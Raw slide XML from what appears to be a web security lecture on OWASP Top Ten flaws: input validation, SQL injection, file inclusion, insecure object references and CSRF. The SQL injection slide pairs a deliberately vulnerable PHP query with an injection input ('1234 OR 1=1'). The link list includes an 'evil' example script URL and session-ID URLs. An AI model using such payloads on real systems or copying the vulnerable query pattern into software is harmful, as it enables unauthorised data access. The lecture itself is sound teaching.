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92" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId34"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId35"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="330" r:id="rId2"/>
    <p:sldId id="534" r:id="rId3"/>
    <p:sldId id="506" r:id="rId4"/>
    <p:sldId id="507" r:id="rId5"/>
    <p:sldId id="508" r:id="rId6"/>
    <p:sldId id="509" r:id="rId7"/>
    <p:sldId id="510" r:id="rId8"/>
    <p:sldId id="511" r:id="rId9"/>
    <p:sldId id="512" r:id="rId10"/>
    <p:sldId id="513" r:id="rId11"/>
    <p:sldId id="514" r:id="rId12"/>
    <p:sldId id="515" r:id="rId13"/>
    <p:sldId id="516" r:id="rId14"/>
    <p:sldId id="517" r:id="rId15"/>
    <p:sldId id="518" r:id="rId16"/>
    <p:sldId id="519" r:id="rId17"/>
    <p:sldId id="520" r:id="rId18"/>
    <p:sldId id="521" r:id="rId19"/>
    <p:sldId id="522" r:id="rId20"/>
    <p:sldId id="523" r:id="rId21"/>
    <p:sldId id="524" r:id="rId22"/>
    <p:sldId id="525" r:id="rId23"/>
    <p:sldId id="526" r:id="rId24"/>
    <p:sldId id="527" r:id="rId25"/>
    <p:sldId id="536" r:id="rId26"/>
    <p:sldId id="535" r:id="rId27"/>
    <p:sldId id="528" r:id="rId28"/>
    <p:sldId id="529" r:id="rId29"/>
    <p:sldId id="530" r:id="rId30"/>
    <p:sldId id="531" r:id="rId31"/>
    <p:sldId id="532" r:id="rId32"/>
    <p:sldId id="533" r:id="rId33"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7010400" cy="9296400"/>
  <p:custDataLst>
    <p:tags r:id="rId3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87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4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BB3B7EE-9478-4806-B8D5-5A18388BF2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35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5AC9058-2E75-4585-961F-DF979837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048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2" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="32" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="3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2" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="3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2" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="3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2" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="3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2" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="3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C242C0CF-3710-4226-9B7F-AD8C3DB0E534}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>1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08CE8D69-6EFF-49CA-84ED-A900E7223C28}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11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BF149EC3-F054-40BF-A543-80AF2DC7D5DE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12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9F678E9E-5E2F-450F-B77C-B7740DA2696F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14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AC971DCC-5AA4-4821-97CF-CC9D9101742E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>15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8218E5B3-5DC6-4843-9D48-5F7411B3C30E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>16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E071B687-41B9-4735-8B29-541C1967D6E2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17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AE1E312C-F99B-4AD5-8FB9-30C25A3689CC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>18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ECA11D01-E4AF-48E6-971A-151D2503BC99}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>19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F2D48387-1B01-4CBE-AFFB-96E390239238}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>20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53E4AC2E-941C-4DBE-AC90-B88C70A5DFBB}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>21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435AE839-5944-49F7-9873-4BC9520F1489}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3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F794B89D-AC58-422A-B157-B27978D46AE4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22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8975"/>
            <a:ext cx="4676775" cy="3508375"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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427538"/>
            <a:ext cx="5124450" cy="419576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1E81D270-2276-4974-9E6C-BDB547D8EEAE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23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8975"/>
            <a:ext cx="4676775" cy="3508375"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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427538"/>
            <a:ext cx="5124450" cy="419576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E6C25198-E08A-424C-B734-B83CD74FC101}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24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8975"/>
            <a:ext cx="4676775" cy="3508375"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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427538"/>
            <a:ext cx="5124450" cy="419576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491A532C-3237-4182-BFA6-661A349FA62B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25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8975"/>
            <a:ext cx="4676775" cy="3508375"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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427538"/>
            <a:ext cx="5124450" cy="419576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F5683CE0-071F-4407-8AA2-98730E1A026E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26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8975"/>
            <a:ext cx="4676775" cy="3508375"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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427538"/>
            <a:ext cx="5124450" cy="419576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64471521-9268-4901-83D1-9105CE8AB82C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27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8975"/>
            <a:ext cx="4676775" cy="3508375"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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427538"/>
            <a:ext cx="5124450" cy="419576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4B7F6750-21E4-4E40-9320-EFA96B768281}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28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8975"/>
            <a:ext cx="4676775" cy="3508375"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill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427538"/>
            <a:ext cx="5124450" cy="419576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90632300-7722-46A2-90F1-86D5BC63E585}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>29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C9F1EDB0-1D83-4DE0-B33F-5901D8E1701C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30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A88A0E81-365B-48AE-B4BD-334ECA936847}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31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98C250F6-6977-44DC-ADAA-69EF2127C539}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>4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CDCEFE38-0DC6-4581-904B-27F6B9E9DCF2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>32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2CE95970-FAB6-4E8C-98C8-2381EDB2FB92}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>5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F9D8AAB9-5B85-4EF5-9515-FB96287C7032}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>6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8FAAC35D-B243-41B3-AF66-C006BE9CBA0D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7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A5205F0E-25C2-4FE5-A671-B8B9F96FEA92}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>8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3F5B6BAD-2DD3-48F4-A286-6C5E9A3B2424}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9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3D0EC739-36E9-4980-A6D6-F8701F596F4C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10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9FF31C-0FF3-4BA3-B793-46CDB100E4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447CE7-AD13-4CAB-8762-76F72D3C6A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3203CE-26CA-48E8-8F9C-EF4AB755E9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8D8526-F6FE-481F-9432-1B67E373CD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B2F0E-B937-43B5-B549-5CFE0CFCF5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F0F02-9844-45AF-BF48-B09A2A3030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2AD8D7-D25E-4440-BF63-15F95139D1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45DB24-480E-4224-BD75-390C5465AE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D70E9-4176-474A-A083-0DA39C5A0C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5A401E-E934-41E6-BB4E-A0123EECA3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3CFD7CE6-BA46-42C0-B49E-31B7683F61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59EAFA6-7F5D-408F-9948-904AA1457B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rposedrivenlife.com/basket.aspx?UserID=228473&amp;SessionID=2jQvliAq0Jb24SXYu2kF&amp;SID=1&amp;Category_ID=2&amp;Product_ID=95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ystematika.it/results.asp?SKU_PUBLISHER=CPB1360WWFS180&amp;SessionID=1073331003" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ue.eu.int/cms3_applications/applications/librarie/freeBookShop.asp?SessionID=200441131271825256632533-706011819&amp;LANG=EN&amp;BookType=1&amp;SessLang=EN&amp;cmsID=544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curehq.com/superdept.wml&amp;sessionid=200410912413626981&amp;superdeptid=30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t-security.org/dl/articles/session_fixation.pdf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ntistry.superlinks.com/admin/main.cfm?CFID=000000&amp;CFTOKEN=000000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wasp.org/index.php/Category:OWASP_Top_Ten_Projec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xample.com/evil.j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fast.info/myspace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TAGS/ref_urlencode.as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696200" cy="2209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Web Security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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Other considerations in input validation</a:t>
            </a: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 wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Data type (string, integer, real, etc…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Allowed character set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Minimum and maximum length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Whether null is allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Whether the parameter is required or not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Whether duplicates are allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Numeric range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Specific legal values (enumeration)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Specific patterns (regular expressions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0"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charset="-128"/>
              </a:rPr>
              <a:t>Use of Struts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 wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Struts is based on MVC framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Free book “Starting Struts 2” by Ian Roughley</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Specific help offered by struts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Strut Validator: ensure every form request the program accepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	is validated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>However, not all validation can be done using Strut Validator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	Especially those validations that require a lot of application context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" smtClean="0"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r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>2. Injection Flaws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8382000" cy="5181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1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Injection flaws, particularly SQL injection, are common in web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Injection occurs when user-supplied data is sent to an interpreter as part of a command or query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The attacker's hostile data tricks the interpreter into executing unintended commands or changing data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Types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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>SQL, LDAP, XPATH, XSLT, HTML, XML, OS command, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Example in PHP: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400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> = “SELECT * FROM table WHERE id= ‘ “ . $_REQEST[‘id’] . “’”;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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attack scenario: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>id= 1234 OR 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention 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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Input validation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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use strongly typed parameterized query API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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Enforce least privilege (when connecting to database)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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Avoid detailed error messages (they are useful to the attackers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use stored procedures (but it isn’t 100% safe either!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> For example exec(), concatenation of arguments)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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not use dynamic query interfaces (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>())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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Do not use simple escaping functions (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>(“’”,”’”)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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Watch out for canonicalization errors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 smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>3. Malicious File Injection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838200" y="1827213"/>
            <a:ext cx="7845425" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>4. Insecure Direct Object Reference</a:t>
            </a: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534400" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attackers can manipulate those references to access other objects without authorization. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attacker signs on with a legitimate account number </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Site appends the account number as part of subsequent queries as either part of the URL or as a form parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attacker manipulates the account number being submitted (via HTTP proxy)  and resubmits the modified query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attacker is able to view account information of other account holders via brute force trial and error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Avoid exposing private object references to users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Validate any private object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Verify authorization to all referenced objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" smtClean="0"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sz="3200" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>5. Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0">
